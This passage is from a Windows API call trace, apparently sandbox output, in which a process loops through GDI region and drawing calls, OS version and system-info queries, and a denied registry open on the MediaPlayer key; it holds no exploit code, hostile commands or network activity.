dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.709] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.709] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.709] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.709] BeginPath (hdc=0x0) returned 0 [0087.709] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.709] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.709] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.709] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.709] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.709] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.709] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.709] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.710] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x370401d6 [0087.710] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x390401d3 [0087.710] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a3b [0087.710] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a3c [0087.710] CombineRgn (hrgnDst=0x1040a3b, hrgnSrc1=0x370401d6, hrgnSrc2=0x390401d3, iMode=1) returned 1 [0087.710] CombineRgn (hrgnDst=0x1040a3c, hrgnSrc1=0x370401d6, hrgnSrc2=0x390401d3, iMode=4) returned 2 [0087.710] CreateSolidBrush (color=0xff) returned 0x2100a3a [0087.710] CreateSolidBrush (color=0xff0000) returned 0x1100a3d [0087.710] DeleteObject (ho=0x1100a3d) returned 1 [0087.710] DeleteObject (ho=0x390401d3) returned 1 [0087.710] DeleteObject (ho=0x370401d6) returned 1 [0087.710] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.710] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.710] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.710] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.710] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.710] BeginPath (hdc=0x0) returned 0 [0087.710] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.710] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.710] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.710] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.710] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.710] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.710] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.710] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.710] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3a0401d3 [0087.710] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x380401d6 [0087.710] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a3e [0087.710] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a3f [0087.710] CombineRgn (hrgnDst=0x1040a3e, hrgnSrc1=0x3a0401d3, hrgnSrc2=0x380401d6, iMode=1) returned 1 [0087.710] CombineRgn (hrgnDst=0x1040a3f, hrgnSrc1=0x3a0401d3, hrgnSrc2=0x380401d6, iMode=4) returned 2 [0087.710] CreateSolidBrush (color=0xff) returned 0x2100a3d [0087.710] CreateSolidBrush (color=0xff0000) returned 0x1100a40 [0087.710] DeleteObject (ho=0x1100a40) returned 1 [0087.710] DeleteObject (ho=0x380401d6) returned 1 [0087.710] DeleteObject (ho=0x3a0401d3) returned 1 [0087.710] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.710] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.711] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.711] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.711] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.711] BeginPath (hdc=0x0) returned 0 [0087.711] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.711] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.711] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.711] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.711] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.711] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.711] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.711] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x390401d6 [0087.711] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3b0401d3 [0087.711] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a41 [0087.711] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a42 [0087.711] CombineRgn (hrgnDst=0x1040a41, hrgnSrc1=0x390401d6, hrgnSrc2=0x3b0401d3, iMode=1) returned 1 [0087.711] CombineRgn (hrgnDst=0x1040a42, hrgnSrc1=0x390401d6, hrgnSrc2=0x3b0401d3, iMode=4) returned 2 [0087.711] CreateSolidBrush (color=0xff) returned 0x2100a40 [0087.711] CreateSolidBrush (color=0xff0000) returned 0x1100a43 [0087.711] DeleteObject (ho=0x1100a43) returned 1 [0087.711] DeleteObject (ho=0x3b0401d3) returned 1 [0087.711] DeleteObject (ho=0x390401d6) returned 1 [0087.711] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.711] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.711] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.711] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.711] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.711] BeginPath (hdc=0x0) returned 0 [0087.711] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.711] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.711] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.711] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.711] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.711] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.711] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.712] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3c0401d3 [0087.712] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3a0401d6 [0087.712] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a44 [0087.712] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a45 [0087.712] CombineRgn (hrgnDst=0x1040a44, hrgnSrc1=0x3c0401d3, hrgnSrc2=0x3a0401d6, iMode=1) returned 1 [0087.712] CombineRgn (hrgnDst=0x1040a45, hrgnSrc1=0x3c0401d3, hrgnSrc2=0x3a0401d6, iMode=4) returned 2 [0087.712] CreateSolidBrush (color=0xff) returned 0x2100a43 [0087.712] CreateSolidBrush (color=0xff0000) returned 0x1100a46 [0087.712] DeleteObject (ho=0x1100a46) returned 1 [0087.712] DeleteObject (ho=0x3a0401d6) returned 1 [0087.712] DeleteObject (ho=0x3c0401d3) returned 1 [0087.712] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.712] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.712] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.712] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.712] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.712] BeginPath (hdc=0x0) returned 0 [0087.712] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.712] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.712] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.712] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.712] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.712] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.712] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.712] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.712] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3b0401d6 [0087.712] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3d0401d3 [0087.712] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a47 [0087.712] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a48 [0087.712] CombineRgn (hrgnDst=0x1040a47, hrgnSrc1=0x3b0401d6, hrgnSrc2=0x3d0401d3, iMode=1) returned 1 [0087.712] CombineRgn (hrgnDst=0x1040a48, hrgnSrc1=0x3b0401d6, hrgnSrc2=0x3d0401d3, iMode=4) returned 2 [0087.712] CreateSolidBrush (color=0xff) returned 0x2100a46 [0087.712] CreateSolidBrush (color=0xff0000) returned 0x1100a49 [0087.712] DeleteObject (ho=0x1100a49) returned 1 [0087.712] DeleteObject (ho=0x3d0401d3) returned 1 [0087.712] DeleteObject (ho=0x3b0401d6) returned 1 [0087.712] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.712] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.713] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.713] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.713] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.713] BeginPath (hdc=0x0) returned 0 [0087.713] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.713] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.713] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.713] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.713] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.713] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.713] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.713] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.713] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3e0401d3 [0087.713] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3c0401d6 [0087.713] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a4a [0087.713] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a4b [0087.713] CombineRgn (hrgnDst=0x1040a4a, hrgnSrc1=0x3e0401d3, hrgnSrc2=0x3c0401d6, iMode=1) returned 1 [0087.713] CombineRgn (hrgnDst=0x1040a4b, hrgnSrc1=0x3e0401d3, hrgnSrc2=0x3c0401d6, iMode=4) returned 2 [0087.713] CreateSolidBrush (color=0xff) returned 0x2100a49 [0087.713] CreateSolidBrush (color=0xff0000) returned 0x1100a4c [0087.713] DeleteObject (ho=0x1100a4c) returned 1 [0087.713] DeleteObject (ho=0x3c0401d6) returned 1 [0087.713] DeleteObject (ho=0x3e0401d3) returned 1 [0087.713] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.713] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.713] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.713] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.713] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.713] BeginPath (hdc=0x0) returned 0 [0087.713] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.713] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.713] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.713] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.713] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.713] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.713] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.713] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.714] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3d0401d6 [0087.714] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3f0401d3 [0087.714] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a4d [0087.714] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a4e [0087.714] CombineRgn (hrgnDst=0x1040a4d, hrgnSrc1=0x3d0401d6, hrgnSrc2=0x3f0401d3, iMode=1) returned 1 [0087.714] CombineRgn (hrgnDst=0x1040a4e, hrgnSrc1=0x3d0401d6, hrgnSrc2=0x3f0401d3, iMode=4) returned 2 [0087.714] CreateSolidBrush (color=0xff) returned 0x2100a4c [0087.714] CreateSolidBrush (color=0xff0000) returned 0x1100a4f [0087.714] DeleteObject (ho=0x1100a4f) returned 1 [0087.714] DeleteObject (ho=0x3f0401d3) returned 1 [0087.714] DeleteObject (ho=0x3d0401d6) returned 1 [0087.714] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.714] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.714] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.714] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.714] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.714] BeginPath (hdc=0x0) returned 0 [0087.714] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.714] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.714] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.714] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.714] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.714] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.714] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.714] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.714] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x400401d3 [0087.714] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3e0401d6 [0087.714] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a50 [0087.714] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a51 [0087.714] CombineRgn (hrgnDst=0x1040a50, hrgnSrc1=0x400401d3, hrgnSrc2=0x3e0401d6, iMode=1) returned 1 [0087.714] CombineRgn (hrgnDst=0x1040a51, hrgnSrc1=0x400401d3, hrgnSrc2=0x3e0401d6, iMode=4) returned 2 [0087.714] CreateSolidBrush (color=0xff) returned 0x2100a4f [0087.714] CreateSolidBrush (color=0xff0000) returned 0x1100a52 [0087.714] DeleteObject (ho=0x1100a52) returned 1 [0087.714] DeleteObject (ho=0x3e0401d6) returned 1 [0087.714] DeleteObject (ho=0x400401d3) returned 1 [0087.714] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.714] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.714] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.714] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.714] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.715] BeginPath (hdc=0x0) returned 0 [0087.715] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.715] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.715] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.715] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.715] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.715] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.715] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.715] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.715] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3f0401d6 [0087.715] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x410401d3 [0087.715] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a53 [0087.715] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a54 [0087.715] CombineRgn (hrgnDst=0x1040a53, hrgnSrc1=0x3f0401d6, hrgnSrc2=0x410401d3, iMode=1) returned 1 [0087.715] CombineRgn (hrgnDst=0x1040a54, hrgnSrc1=0x3f0401d6, hrgnSrc2=0x410401d3, iMode=4) returned 2 [0087.715] CreateSolidBrush (color=0xff) returned 0x2100a52 [0087.715] CreateSolidBrush (color=0xff0000) returned 0x1100a55 [0087.715] DeleteObject (ho=0x1100a55) returned 1 [0087.715] DeleteObject (ho=0x410401d3) returned 1 [0087.715] DeleteObject (ho=0x3f0401d6) returned 1 [0087.715] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.715] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.715] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.715] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.715] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.715] BeginPath (hdc=0x0) returned 0 [0087.715] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.715] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.715] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.715] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.715] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) 